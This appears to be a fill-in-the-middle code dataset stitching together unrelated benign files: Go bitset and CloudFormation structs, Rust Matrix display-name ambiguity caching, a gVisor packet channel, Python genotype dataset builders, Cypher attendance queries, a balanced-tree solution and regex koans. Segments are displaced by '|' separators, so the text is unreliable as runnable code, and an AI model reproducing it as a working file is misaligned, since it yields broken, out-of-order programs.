return uint(total)
}
func (b bitset) hash() uint64 {
hash := uint64(b.popcnt())
for _, v := range b {
hash ^= v
}
return hash
}
func (b bitset) equals(b2 bitset) bool {
if len(b) != len(b2) {
return false
}
for i := range b {
if b[i] != b2[i] {
return false
}
}
return true
}
| {
extra = 1
} |
aws-cloudwatch-anomalydetector_dimension.go | package cloudwatch
import (
"github.com/fmechant/goformation/v4/cloudformation/policies"
) |
// Name AWS CloudFormation Property
// Required: true
// See: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-cloudwatch-anomalydetector-dimension.html#cfn-cloudwatch-anomalydetector-dimension-name
Name string `json:"Name,omitempty"`
// Value AWS CloudFormation Property
// Required: true
// See: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-cloudwatch-anomalydetector-dimension.html#cfn-cloudwatch-anomalydetector-dimension-value
Value string `json:"Value,omitempty"`
// AWSCloudFormationDeletionPolicy represents a CloudFormation DeletionPolicy
AWSCloudFormationDeletionPolicy policies.DeletionPolicy `json:"-"`
// AWSCloudFormationUpdateReplacePolicy represents a CloudFormation UpdateReplacePolicy
AWSCloudFormationUpdateReplacePolicy policies.UpdateReplacePolicy `json:"-"`
// AWSCloudFormationDependsOn stores the logical ID of the resources to be created before this resource
AWSCloudFormationDependsOn []string `json:"-"`
// AWSCloudFormationMetadata stores structured data associated with this resource
AWSCloudFormationMetadata map[string]interface{} `json:"-"`
// AWSCloudFormationCondition stores the logical ID of the condition that must be satisfied for this resource to be created
AWSCloudFormationCondition string `json:"-"`
}
// AWSCloudFormationType returns the AWS CloudFormation resource type
func (r *AnomalyDetector_Dimension) AWSCloudFormationType() string {
return "AWS::CloudWatch::AnomalyDetector.Dimension"
} |
// AnomalyDetector_Dimension AWS CloudFormation Resource (AWS::CloudWatch::AnomalyDetector.Dimension)
// See: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-cloudwatch-anomalydetector-dimension.html
type AnomalyDetector_Dimension struct { |
ambiguity_map.rs | // Copyright 2021 The Matrix.org Foundation C.I.C.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use std::collections::{BTreeMap, BTreeSet};
use matrix_sdk_common::deserialized_responses::{AmbiguityChange, MemberEvent};
use ruma::{events::room::member::MembershipState, EventId, RoomId, UserId};
use tracing::trace;
use super::{Result, StateChanges};
use crate::Store;
/// Cache tracking, per room, which display names are shared by more than one
/// user, plus the ambiguity changes produced while handling member events.
#[derive(Clone, Debug)]
pub struct AmbiguityCache {
    /// Store used to load member events, profiles, and display-name user
    /// sets that are not yet cached.
    pub store: Store,
    /// Per-room map from display name to the set of users currently using it.
    pub cache: BTreeMap<RoomId, BTreeMap<String, BTreeSet<UserId>>>,
    /// Per-room map from member-event ID to the ambiguity change it caused.
    pub changes: BTreeMap<RoomId, BTreeMap<EventId, AmbiguityChange>>,
}
/// The set of users that share a single display name within one room.
#[derive(Clone, Debug)]
struct AmbiguityMap {
    /// The display name this entry tracks.
    display_name: String,
    /// Users currently using `display_name`.
    users: BTreeSet<UserId>,
}
impl AmbiguityMap {
    /// Remove `user_id` from this display-name entry.
    ///
    /// Returns the single remaining user when the removal leaves exactly one
    /// user behind, i.e. the user whose name just became unambiguous.
    fn remove(&mut self, user_id: &UserId) -> Option<UserId> {
        self.users.remove(user_id);
        match self.user_count() {
            1 => self.users.iter().next().cloned(),
            _ => None,
        }
    }
    /// Add `user_id` to this display-name entry.
    ///
    /// Returns the previously sole user when there was exactly one user
    /// before the insertion, i.e. the user whose name just became ambiguous.
    fn add(&mut self, user_id: UserId) -> Option<UserId> {
        // Capture the existing user *before* inserting, since the insertion
        // changes the count.
        let previously_unique = match self.user_count() {
            1 => self.users.iter().next().cloned(),
            _ => None,
        };
        self.users.insert(user_id);
        previously_unique
    }
    /// Number of users currently sharing this display name.
    fn user_count(&self) -> usize {
        self.users.len()
    }
    /// Whether more than one user shares this display name.
    fn is_ambiguous(&self) -> bool {
        self.user_count() > 1
    }
}
impl AmbiguityCache {
pub fn | (store: Store) -> Self {
Self { store, cache: BTreeMap::new(), changes: BTreeMap::new() }
}
    /// Handle a newly received member event: update the cached display-name
    /// maps for the affected room and record the resulting
    /// `AmbiguityChange` under the event's ID.
    pub async fn handle_event(
        &mut self,
        changes: &StateChanges,
        room_id: &RoomId,
        member_event: &MemberEvent,
    ) -> Result<()> {
        // Synapse seems to have a bug where it puts the same event into the
        // state and the timeline sometimes.
        //
        // Since our state, e.g. the old display name, already ended up inside
        // the state changes and we're pulling stuff out of the cache if it's
        // there calculating this twice for the same event will result in an
        // incorrect AmbiguityChange overwriting the correct one. In other
        // words, this method is not idempotent so we make it by ignoring
        // duplicate events.
        if self
            .changes
            .get(room_id)
            .map(|c| c.contains_key(&member_event.event_id))
            .unwrap_or(false)
        {
            return Ok(());
        }
        // old_map: users sharing the member's previous display name;
        // new_map: users sharing the display name carried by this event.
        let (mut old_map, mut new_map) = self.get(changes, room_id, member_event).await?;
        let display_names_same = match (&old_map, &new_map) {
            (Some(a), Some(b)) => a.display_name == b.display_name,
            _ => false,
        };
        // An unchanged display name cannot affect ambiguity.
        if display_names_same {
            return Ok(());
        }
        // Moving the member between the two name sets may disambiguate a user
        // left behind in the old set and/or ambiguate a user in the new one.
        let disambiguated_member = old_map.as_mut().and_then(|o| o.remove(&member_event.state_key));
        let ambiguated_member =
            new_map.as_mut().and_then(|n| n.add(member_event.state_key.clone()));
        let ambiguous = new_map.as_ref().map(|n| n.is_ambiguous()).unwrap_or(false);
        self.update(room_id, old_map, new_map);
        let change = AmbiguityChange {
            disambiguated_member,
            ambiguated_member,
            member_ambiguous: ambiguous,
        };
        trace!("Handling display name ambiguity for {}: {:#?}", member_event.state_key, change);
        self.add_change(room_id, member_event.event_id.clone(), change);
        Ok(())
    }
fn update(
&mut self,
room_id: &RoomId,
old_map: Option<AmbiguityMap>,
new_map: Option<AmbiguityMap>,
) {
let entry = self.cache.entry(room_id.clone()).or_insert_with(BTreeMap::new);
if let Some(old) = old_map {
entry.insert(old.display_name, old.users);
}
if let Some(new) = new_map {
entry.insert(new.display_name, new.users);
}
}
    /// Record the `AmbiguityChange` caused by the member event with the given
    /// `event_id` in the given room.
    fn add_change(&mut self, room_id: &RoomId, event_id: EventId, change: AmbiguityChange) {
        self.changes.entry(room_id.clone()).or_insert_with(BTreeMap::new).insert(event_id, change);
    }
    /// Compute the ambiguity maps for the member's old display name and for
    /// the display name carried by `member_event`.
    ///
    /// Either side is `None` when there is no relevant display name, e.g.
    /// the member was not joined/invited before this event, or is not after
    /// it.
    async fn get(
        &mut self,
        changes: &StateChanges,
        room_id: &RoomId,
        member_event: &MemberEvent,
    ) -> Result<(Option<AmbiguityMap>, Option<AmbiguityMap>)> {
        use MembershipState::*;
        // Prefer the member event from the current batch of state changes,
        // falling back to the store.
        let old_event = if let Some(m) =
            changes.members.get(room_id).and_then(|m| m.get(&member_event.state_key))
        {
            Some(m.clone())
        } else {
            self.store.get_member_event(room_id, &member_event.state_key).await?
        };
        // Resolve the old display name, in priority order: profile from this
        // batch of changes, then the stored profile, then the old member
        // event's own displayname; finally fall back to the user-ID
        // localpart.
        let old_display_name = if let Some(event) = old_event {
            if matches!(event.content.membership, Join | Invite) {
                let display_name = if let Some(d) = changes
                    .profiles
                    .get(room_id)
                    .and_then(|p| p.get(&member_event.state_key))
                    .and_then(|p| p.displayname.as_deref())
                {
                    Some(d.to_string())
                } else if let Some(d) = self
                    .store
                    .get_profile(room_id, &member_event.state_key)
                    .await?
                    .and_then(|c| c.displayname)
                {
                    Some(d)
                } else {
                    event.content.displayname.clone()
                };
                Some(display_name.unwrap_or_else(|| event.state_key.localpart().to_string()))
            } else {
                None
            }
        } else {
            None
        };
        let old_map = if let Some(old_name) = old_display_name.as_deref() {
            // Users sharing the old name: use the cached set if present,
            // otherwise load it from the store.
            let old_display_name_map = if let Some(u) =
                self.cache.entry(room_id.clone()).or_insert_with(BTreeMap::new).get(old_name)
            {
                u.clone()
            } else {
                self.store.get_users_with_display_name(room_id, old_name).await?
            };
            Some(AmbiguityMap { display_name: old_name.to_string(), users: old_display_name_map })
        } else {
            None
        };
        // Only joined/invited members occupy a display name.
        let new_map = if matches!(member_event.content.membership, Join | Invite) {
            let new = member_event
                .content
                .displayname
                .as_deref()
                .unwrap_or_else(|| member_event.state_key.localpart());
            // We don't allow other users to set the display name, so if we
            // have a more trusted version of the display
            // name use that.
            let new_display_name = if member_event.sender.as_str() == member_event.state_key {
                new
            } else if let Some(old) = old_display_name.as_deref() {
                old
            } else {
                new
            };
            // Same cache-then-store lookup as for the old name.
            let new_display_name_map = if let Some(u) = self
                .cache
                .entry(room_id.clone())
                .or_insert_with(BTreeMap::new)
                .get(new_display_name)
            {
                u.clone()
            } else {
                self.store.get_users_with_display_name(room_id, new_display_name).await?
            };
            Some(AmbiguityMap {
                display_name: new_display_name.to_string(),
                users: new_display_name_map,
            })
        } else {
            None
        };
        Ok((old_map, new_map))
    }
}
| new |
channel.go | // Copyright 2018 The gVisor Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Package channel provides the implemention of channel-based data-link layer
// endpoints. Such endpoints allow injection of inbound packets and store
// outbound packets in a channel.
package channel
import (
"context"
"gvisor.dev/gvisor/pkg/sync"
"gvisor.dev/gvisor/pkg/tcpip"
"gvisor.dev/gvisor/pkg/tcpip/header"
"gvisor.dev/gvisor/pkg/tcpip/stack"
)
// PacketInfo holds all the information about an outbound packet.
type PacketInfo struct {
	// Pkt is the outbound packet buffer.
	Pkt *stack.PacketBuffer
	// Proto is the network protocol number of the packet.
	Proto tcpip.NetworkProtocolNumber
	// Route carries the route information the packet was written with.
	Route stack.RouteInfo
}
// Notification is the interface for receiving notification from the packet
// queue.
type Notification interface {
	// WriteNotify will be called when a write happens to the queue.
	WriteNotify()
}
// NotificationHandle is an opaque handle to the registered notification target.
// It can be used to unregister the notification when no longer interested.
//
// +stateify savable
type NotificationHandle struct {
	// n is the wrapped notification target.
	n Notification
}
// queue is the outbound packet queue together with the notification
// targets to invoke on every successful write.
type queue struct {
	// c is the outbound packet channel.
	c chan PacketInfo
	// mu protects fields below.
	mu sync.RWMutex
	// notify holds the registered notification handles.
	notify []*NotificationHandle
}
// Close closes the outbound packet channel. Queued packets can still be
// read; further writes will panic (send on a closed channel).
func (q *queue) Close() {
	close(q.c)
}
// Read performs a non-blocking read of one packet from the queue. The
// boolean result is false when no packet was immediately available.
func (q *queue) Read() (PacketInfo, bool) {
	select {
	case p := <-q.c:
		return p, true
	default:
		return PacketInfo{}, false
	}
}
// ReadContext blocks until a packet is available or ctx is done. The
// boolean result is false when the read was cancelled via ctx.
func (q *queue) ReadContext(ctx context.Context) (PacketInfo, bool) {
	select {
	case pkt := <-q.c:
		return pkt, true
	case <-ctx.Done():
		return PacketInfo{}, false
	}
}
// Write enqueues p for outbound delivery without blocking and reports
// whether the packet was accepted; when the queue is full the packet is
// dropped. On a successful write every registered notification target is
// invoked.
func (q *queue) Write(p PacketInfo) bool {
	wrote := false
	select {
	case q.c <- p:
		wrote = true
	default:
	}
	// Snapshot the handles under a read lock only: Write never mutates
	// q.notify, so concurrent writers don't need to serialize with each
	// other — only with AddNotify/RemoveNotify, which take the write lock.
	q.mu.RLock()
	notify := q.notify
	q.mu.RUnlock()
	if wrote {
		// Send notification outside of lock.
		for _, h := range notify {
			h.n.WriteNotify()
		}
	}
	return wrote
}
// Num returns the number of packets currently buffered in the queue.
func (q *queue) Num() int {
	return len(q.c)
}
// AddNotify registers notify to be invoked on every successful write and
// returns a handle that can later be passed to RemoveNotify.
func (q *queue) AddNotify(notify Notification) *NotificationHandle {
	q.mu.Lock()
	defer q.mu.Unlock()
	h := &NotificationHandle{n: notify}
	q.notify = append(q.notify, h)
	return h
}
// RemoveNotify unregisters the notification target identified by handle.
func (q *queue) RemoveNotify(handle *NotificationHandle) {
	q.mu.Lock()
	defer q.mu.Unlock()
	// Build a fresh slice rather than mutating in place, since Write reads
	// the snapshotted slice outside of the lock.
	kept := make([]*NotificationHandle, 0, len(q.notify))
	for _, h := range q.notify {
		if h == handle {
			continue
		}
		kept = append(kept, h)
	}
	q.notify = kept
}
// Endpoint is link layer endpoint that stores outbound packets in a channel
// and allows injection of inbound packets.
type Endpoint struct {
	// dispatcher delivers injected inbound packets to the network layer;
	// it is set by Attach.
	dispatcher stack.NetworkDispatcher
	// mtu is the fixed MTU reported by this endpoint.
	mtu uint32
	// linkAddr is the link address reported by this endpoint.
	linkAddr tcpip.LinkAddress
	// LinkEPCapabilities is the capability set reported by Capabilities.
	LinkEPCapabilities stack.LinkEndpointCapabilities
	// Outbound packet queue.
	q *queue
}
// New creates a new channel endpoint.
func New(size int, mtu uint32, linkAddr tcpip.LinkAddress) *Endpoint |
// Close closes e. Further packet injections will panic. Reads continue to
// succeed until all packets are read.
func (e *Endpoint) Close() {
	e.q.Close()
}
// Read does non-blocking read one packet from the outbound packet queue.
// The boolean result is false when no packet was queued.
func (e *Endpoint) Read() (PacketInfo, bool) {
	return e.q.Read()
}
// ReadContext does blocking read for one packet from the outbound packet queue.
// It can be cancelled by ctx, and in this case, it returns false.
func (e *Endpoint) ReadContext(ctx context.Context) (PacketInfo, bool) {
	return e.q.ReadContext(ctx)
}
// Drain removes all outbound packets from the channel and counts them.
func (e *Endpoint) Drain() int {
	drained := 0
	for _, ok := e.Read(); ok; _, ok = e.Read() {
		drained++
	}
	return drained
}
// NumQueued returns the number of packet queued for outbound.
func (e *Endpoint) NumQueued() int {
	return e.q.Num()
}
// InjectInbound injects an inbound packet with an empty remote link address.
func (e *Endpoint) InjectInbound(protocol tcpip.NetworkProtocolNumber, pkt *stack.PacketBuffer) {
	e.InjectLinkAddr(protocol, "", pkt)
}
// InjectLinkAddr injects an inbound packet with a remote link address. The
// packet is handed straight to the dispatcher saved by Attach.
func (e *Endpoint) InjectLinkAddr(protocol tcpip.NetworkProtocolNumber, remote tcpip.LinkAddress, pkt *stack.PacketBuffer) {
	e.dispatcher.DeliverNetworkPacket(remote, "" /* local */, protocol, pkt)
}
// Attach saves the stack network-layer dispatcher for use later when packets
// are injected.
func (e *Endpoint) Attach(dispatcher stack.NetworkDispatcher) {
	e.dispatcher = dispatcher
}
// IsAttached implements stack.LinkEndpoint.IsAttached.
func (e *Endpoint) IsAttached() bool {
	return e.dispatcher != nil
}
// MTU implements stack.LinkEndpoint.MTU. It returns the value initialized
// during construction.
func (e *Endpoint) MTU() uint32 {
	return e.mtu
}
// Capabilities implements stack.LinkEndpoint.Capabilities.
func (e *Endpoint) Capabilities() stack.LinkEndpointCapabilities {
	return e.LinkEPCapabilities
}
// GSOMaxSize returns the maximum GSO packet size (fixed at 32 KiB).
func (*Endpoint) GSOMaxSize() uint32 {
	return 1 << 15
}
// MaxHeaderLength returns the maximum size of the link layer header. Given it
// doesn't have a header, it just returns 0.
func (*Endpoint) MaxHeaderLength() uint16 {
	return 0
}
// LinkAddress returns the link address of this endpoint.
func (e *Endpoint) LinkAddress() tcpip.LinkAddress {
	return e.linkAddr
}
// WritePacket stores outbound packets into the channel. A packet rejected
// by a full queue is silently dropped; nil is always returned.
func (e *Endpoint) WritePacket(r stack.RouteInfo, protocol tcpip.NetworkProtocolNumber, pkt *stack.PacketBuffer) tcpip.Error {
	e.q.Write(PacketInfo{
		Pkt:   pkt,
		Proto: protocol,
		Route: r,
	})
	return nil
}
// WritePackets stores outbound packets into the channel. It returns the
// number of packets written; writing stops at the first packet the queue
// rejects (i.e. when the queue is full).
func (e *Endpoint) WritePackets(r stack.RouteInfo, pkts stack.PacketBufferList, protocol tcpip.NetworkProtocolNumber) (int, tcpip.Error) {
	n := 0
	for pkt := pkts.Front(); pkt != nil; pkt = pkt.Next() {
		p := PacketInfo{
			Pkt: pkt,
			Proto: protocol,
			Route: r,
		}
		if !e.q.Write(p) {
			break
		}
		n++
	}
	return n, nil
}
// Wait implements stack.LinkEndpoint.Wait. It is a no-op here.
func (*Endpoint) Wait() {}
// AddNotify adds a notification target for receiving event about outgoing
// packets.
func (e *Endpoint) AddNotify(notify Notification) *NotificationHandle {
	return e.q.AddNotify(notify)
}
// RemoveNotify removes handle from the list of notification targets.
func (e *Endpoint) RemoveNotify(handle *NotificationHandle) {
	e.q.RemoveNotify(handle)
}
// ARPHardwareType implements stack.LinkEndpoint.ARPHardwareType.
func (*Endpoint) ARPHardwareType() header.ARPHardwareType {
	return header.ARPHardwareNone
}
// AddHeader implements stack.LinkEndpoint.AddHeader. The channel endpoint
// has no link-layer header, so this is a no-op.
func (e *Endpoint) AddHeader(local, remote tcpip.LinkAddress, protocol tcpip.NetworkProtocolNumber, pkt *stack.PacketBuffer) {
}
| {
return &Endpoint{
q: &queue{
c: make(chan PacketInfo, size),
},
mtu: mtu,
linkAddr: linkAddr,
}
} |
model.py | from typing import Any, Dict, Hashable, List, Optional
import numpy as np
import xarray as xr
from .typing import ArrayLike
from .utils import create_dataset
DIM_VARIANT = "variants"
DIM_SAMPLE = "samples"
DIM_PLOIDY = "ploidy"
DIM_ALLELE = "alleles"
DIM_GENOTYPE = "genotypes"
def create_genotype_call_dataset(
*,
variant_contig_names: List[str],
variant_contig: ArrayLike,
variant_position: ArrayLike,
variant_allele: ArrayLike,
sample_id: ArrayLike,
call_genotype: ArrayLike,
call_genotype_phased: Optional[ArrayLike] = None,
variant_id: Optional[ArrayLike] = None,
mixed_ploidy: bool = False,
) -> xr.Dataset:
"""Create a dataset of genotype calls.
Parameters
----------
variant_contig_names
The contig names.
variant_contig
[array_like, element type: int]
The (index of the) contig for each variant. | variant_position
[array_like, element type: int]
The reference position of the variant.
variant_allele
[array_like, element_type: zero-terminated bytes, e.g. "S1", or object]
The possible alleles for the variant.
sample_id
[array_like, element type: str or object]
The unique identifier of the sample.
call_genotype
[array_like, element type: int] Genotype, encoded as allele values
(0 for the reference, 1 for the first allele, 2 for the second allele),
or -1 to indicate a missing value.
call_genotype_phased
[array_like, element type: bool, optional] A flag for each call indicating if it is
phased or not. If omitted all calls are unphased.
variant_id
[array_like, element type: str or object, optional]
The unique identifier of the variant.
mixed_ploidy
Specify if the dataset contains genotype calls with a mixture of ploidy levels
using the value -2 to indicate non-alleles.
Returns
-------
The dataset of genotype calls.
"""
data_vars: Dict[Hashable, Any] = {
"variant_contig": ([DIM_VARIANT], variant_contig),
"variant_position": ([DIM_VARIANT], variant_position),
"variant_allele": ([DIM_VARIANT, DIM_ALLELE], variant_allele),
"sample_id": ([DIM_SAMPLE], sample_id),
"call_genotype": (
[DIM_VARIANT, DIM_SAMPLE, DIM_PLOIDY],
call_genotype,
{"mixed_ploidy": mixed_ploidy},
),
"call_genotype_mask": (
[DIM_VARIANT, DIM_SAMPLE, DIM_PLOIDY],
call_genotype < 0,
),
}
if call_genotype_phased is not None:
data_vars["call_genotype_phased"] = (
[DIM_VARIANT, DIM_SAMPLE],
call_genotype_phased,
)
if mixed_ploidy is True:
data_vars["call_genotype_non_allele"] = (
[DIM_VARIANT, DIM_SAMPLE, DIM_PLOIDY],
call_genotype < -1,
)
if variant_id is not None:
data_vars["variant_id"] = ([DIM_VARIANT], variant_id)
attrs: Dict[Hashable, Any] = {"contigs": variant_contig_names}
return create_dataset(data_vars=data_vars, attrs=attrs)
def create_genotype_dosage_dataset(
    *,
    variant_contig_names: List[str],
    variant_contig: ArrayLike,
    variant_position: ArrayLike,
    variant_allele: ArrayLike,
    sample_id: ArrayLike,
    call_dosage: ArrayLike,
    call_genotype_probability: ArrayLike,
    variant_id: Optional[ArrayLike] = None,
) -> xr.Dataset:
    """Create a dataset of genotype dosages.
    Parameters
    ----------
    variant_contig_names
        The contig names.
    variant_contig
        [array_like, element type: int]
        The (index of the) contig for each variant.
    variant_position
        [array_like, element type: int]
        The reference position of the variant.
    variant_allele
        [array_like, element_type: zero-terminated bytes, e.g. "S1", or object]
        The possible alleles for the variant.
    sample_id
        [array_like, element type: str or object]
        The unique identifier of the sample.
    call_dosage
        [array_like, element type: float]
        Dosages, encoded as floats, with NaN indicating a
        missing value.
    call_genotype_probability
        [array_like, element type: float]
        Probabilities, encoded as floats, with NaN indicating a
        missing value.
    variant_id
        [array_like, element type: str or object, optional]
        The unique identifier of the variant.
    Returns
    -------
    The dataset of genotype dosages.
    """
    data_vars: Dict[Hashable, Any] = {
        "variant_contig": ([DIM_VARIANT], variant_contig),
        "variant_position": ([DIM_VARIANT], variant_position),
        "variant_allele": ([DIM_VARIANT, DIM_ALLELE], variant_allele),
        "sample_id": ([DIM_SAMPLE], sample_id),
        "call_dosage": ([DIM_VARIANT, DIM_SAMPLE], call_dosage),
        # Mask variables flag missing entries (encoded as NaN).
        "call_dosage_mask": ([DIM_VARIANT, DIM_SAMPLE], np.isnan(call_dosage)),
        "call_genotype_probability": (
            [DIM_VARIANT, DIM_SAMPLE, DIM_GENOTYPE],
            call_genotype_probability,
        ),
        "call_genotype_probability_mask": (
            [DIM_VARIANT, DIM_SAMPLE, DIM_GENOTYPE],
            np.isnan(call_genotype_probability),
        ),
    }
    # variant_id is optional; only attach it when provided.
    if variant_id is not None:
        data_vars["variant_id"] = ([DIM_VARIANT], variant_id)
    # Contig names are stored as dataset-level metadata, not a variable.
    attrs: Dict[Hashable, Any] = {"contigs": variant_contig_names}
    return create_dataset(data_vars=data_vars, attrs=attrs)
component-service-cypher.js | // Adding the records of the services underneath so that we can have the total attendances and incomes
// Weekly attendance/income totals for any supported church level; walks up
// to five HAS_COMPONENT hops so that every descendant service record from
// the last two months is aggregated.
export const componentServiceAggregates = `
MATCH (church {id:$id}) WHERE church:Bacenta OR church:Constituency OR church:Council OR church:Stream OR church:GatheringService
MATCH (church)-[:HAS_HISTORY]->(:ServiceLog)-[:HAS_COMPONENT*1..5]->(componentServices:ServiceLog)
MATCH (componentServices)-[:HAS_SERVICE]->(componentRecords:ServiceRecord)
MATCH (componentRecords)-[:SERVICE_HELD_ON]->(date:TimeGraph)
WHERE date.date > date() - duration({months: 2})
WITH DISTINCT componentRecords, date(date.date).week AS week ORDER BY week
RETURN week AS week,SUM(componentRecords.attendance) AS attendance, SUM(componentRecords.income) AS income ORDER BY week DESC LIMIT toInteger($limit)
`
// Same weekly aggregation scoped to one Bacenta (a single HAS_COMPONENT hop).
export const componentBacentaServiceAggregates = `
MATCH (church:Bacenta {id:$id})
MATCH (church)-[:HAS_HISTORY]->(:ServiceLog)-[:HAS_COMPONENT]->(componentServices:ServiceLog)
MATCH (componentServices)-[:HAS_SERVICE]->(componentRecords:ServiceRecord)
MATCH (componentRecords)-[:SERVICE_HELD_ON]->(date:TimeGraph)
WHERE date.date > date() - duration({months: 2})
WITH DISTINCT componentRecords, date(date.date).week AS week ORDER BY week
RETURN week AS week,SUM(componentRecords.attendance) AS attendance, SUM(componentRecords.income) AS income ORDER BY week DESC LIMIT toInteger($limit)
`
export const componentConstituencyServiceAggregates = `
MATCH (church:Constituency {id:$id})
MATCH (church)-[:HAS_HISTORY]->(:ServiceLog)-[:HAS_COMPONENT*1..2]->(componentServices:ServiceLog)
MATCH (componentServices)-[:HAS_SERVICE]->(componentRecords:ServiceRecord)
| RETURN week AS week, SUM(componentRecords.attendance) AS attendance, SUM(componentRecords.income) AS income ORDER BY week DESC LIMIT toInteger($limit)
`
// Weekly aggregates for a Council: up to three HAS_COMPONENT hops cover all
// of its descendant service logs.
export const componentCouncilServiceAggregates = `
MATCH (church:Council {id:$id})
MATCH (church)-[:HAS_HISTORY]->(:ServiceLog)-[:HAS_COMPONENT*1..3]->(componentServices:ServiceLog)
MATCH (componentServices)-[:HAS_SERVICE]->(componentRecords:ServiceRecord)
MATCH (componentRecords)-[:SERVICE_HELD_ON]->(date:TimeGraph)
WHERE date.date > date() - duration({months: 2})
WITH DISTINCT componentRecords, date(date.date).week AS week ORDER BY week
RETURN week AS week,SUM(componentRecords.attendance) AS attendance, SUM(componentRecords.income) AS income ORDER BY week DESC LIMIT toInteger($limit)
`
// Weekly aggregates for a Stream: up to four HAS_COMPONENT hops.
export const componentStreamServiceAggregates = `
MATCH (church:Stream {id:$id})
MATCH (church)-[:HAS_HISTORY]->(:ServiceLog)-[:HAS_COMPONENT*1..4]->(componentServices:ServiceLog)
MATCH (componentServices)-[:HAS_SERVICE]->(componentRecords:ServiceRecord)
MATCH (componentRecords)-[:SERVICE_HELD_ON]->(date:TimeGraph)
WHERE date.date > date() - duration({months: 2})
WITH DISTINCT componentRecords, date(date.date).week AS week ORDER BY week
RETURN week AS week,SUM(componentRecords.attendance) AS attendance, SUM(componentRecords.income) AS income ORDER BY week DESC LIMIT toInteger($limit)
`
export const componentGatheringServiceServiceAggregates = `
MATCH (church:GatheringService {id:$id})
MATCH (church)-[:HAS_HISTORY]->(:ServiceLog)-[:HAS_COMPONENT*1..5]->(componentServices:ServiceLog)
MATCH (componentServices)-[:HAS_SERVICE]->(componentRecords:ServiceRecord)
MATCH (componentRecords)-[:SERVICE_HELD_ON]->(date:TimeGraph)
WHERE date.date > date() - duration({months: 2})
WITH DISTINCT componentRecords, date(date.date).week AS week ORDER BY week
RETURN week AS week, SUM(componentRecords.attendance) AS attendance, SUM(componentRecords.income) AS income ORDER BY week DESC LIMIT toInteger($limit)
` | MATCH (componentRecords)-[:SERVICE_HELD_ON]->(date:TimeGraph)
WHERE date.date > date() - duration({months: 2})
WITH DISTINCT componentRecords, date(date.date).week AS week ORDER BY week
|
110. Balanced Binary Tree.go | package algorithms
import (
"github.com/ljun20160606/leetcode/algorithms"
)
/**
* Definition for a binary tree node.
* type TreeNode struct {
* Val int
* Left *TreeNode
* Right *TreeNode
* }
*/
type TreeNode = algorithms.TreeNode
// isBalanced reports whether the binary tree rooted at root is
// height-balanced: for every node the heights of its two subtrees differ
// by at most one.
func isBalanced(root *TreeNode) bool {
	return balancedHeight(root) >= 0
}

// balancedHeight returns the height of the tree rooted at root, or -1 if
// the tree is not height-balanced. Computing height and balance in one
// traversal makes the check O(n), instead of the O(n^2) cost of
// recomputing subtree heights at every node.
func balancedHeight(root *TreeNode) int {
	if root == nil {
		return 0
	}
	left := balancedHeight(root.Left)
	if left < 0 {
		return -1
	}
	right := balancedHeight(root.Right)
	if right < 0 {
		return -1
	}
	if diff := left - right; diff < -1 || diff > 1 {
		return -1
	}
	if left > right {
		return left + 1
	}
	return right + 1
}
func heightOfTree(root *TreeNode) int {
if root == nil {
return 0
}
if root.Left == nil && root.Right == nil {
return 1
}
if root.Left == nil |
if root.Right == nil {
return heightOfTree(root.Left) + 1
}
left := heightOfTree(root.Left)
right := heightOfTree(root.Right)
if left > right {
return left + 1
}
return right + 1
}
| {
return heightOfTree(root.Right) + 1
} |
about_regex.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
import re
class | (Koan):
"""
These koans are based on Ben's book: Regular Expressions in 10
minutes. I found this book very useful, so I decided to write
a koan file in order to practice everything it taught me.
http://www.forta.com/books/0672325667/
"""
    def test_matching_literal_text(self):
        """
        Lesson 1 Matching Literal String
        """
        string = "Hello, my name is Felix and these koans are based " + \
            "on Ben's book: Regular Expressions in 10 minutes."
        # re.search scans the whole string and returns a match object for
        # the first occurrence of the literal pattern.
        m = re.search('Felix', string)
        self.assertTrue(
            m and m.group(0) and
            m.group(0) == 'Felix',
            "I want my name")
    def test_matching_literal_text_how_many(self):
        """
        Lesson 1 -- How many matches?
        The default behaviour of most regular expression engines is
        to return just the first match. In python you have the
        following options:
        match() --> Determine if the RE matches at the
        beginning of the string.
        search() --> Scan through a string, looking for any
        location where this RE matches.
        findall() --> Find all substrings where the RE
        matches, and return them as a list.
        finditer() --> Find all substrings where the RE
        matches, and return them as an iterator.
        """
        string = ("Hello, my name is Felix and these koans are based " +
                  "on Ben's book: Regular Expressions in 10 minutes. " +
                  "Repeat My name is Felix")
        # re.match anchors at the start of the string, so it finds nothing
        # here even though 'Felix' occurs twice later on.
        m = re.match('Felix', string)  # TIP: match may not be the best option
        # I want to know how many times my name appears
        self.assertEqual(m, None)
    def test_matching_literal_text_not_case_sensitivity(self):
        """
        Lesson 1 -- Matching Literal String non case sensitivity.
        Most regex implementations also support matches that are not
        case sensitive. In python you can use re.IGNORECASE, in
        Javascript you can specify the optional i flag. In Ben's
        book you can see more languages.
        """
        string = "Hello, my name is Felix or felix and this koan " + \
            "is based on Ben's book: Regular Expressions in 10 minutes."
        # Without a flag, only the exact-case spelling matches.
        self.assertEqual(re.findall("felix", string), ['felix'])
        # With re.IGNORECASE, both capitalizations match.
        self.assertEqual(re.findall("felix", string, re.IGNORECASE), ['Felix', 'felix'])
def test_matching_any_character(self):
"""
Lesson 1: Matching any character
`.` matches any character: alphabetic characters, digits,
and punctuation.
"""
string = "pecks.xlx\n" \
+ "orders1.xls\n" \
+ "apec1.xls\n" \
+ "na1.xls\n" \
+ "na2.xls\n" \
+ "sa1.xls"
# I want to find all uses of myArray
change_this_search_string = 'a..xls'
self.assertEquals(
len(re.findall(change_this_search_string, string)),
3)
def test_matching_set_character(self):
"""
Lesson 2 -- Matching sets of characters
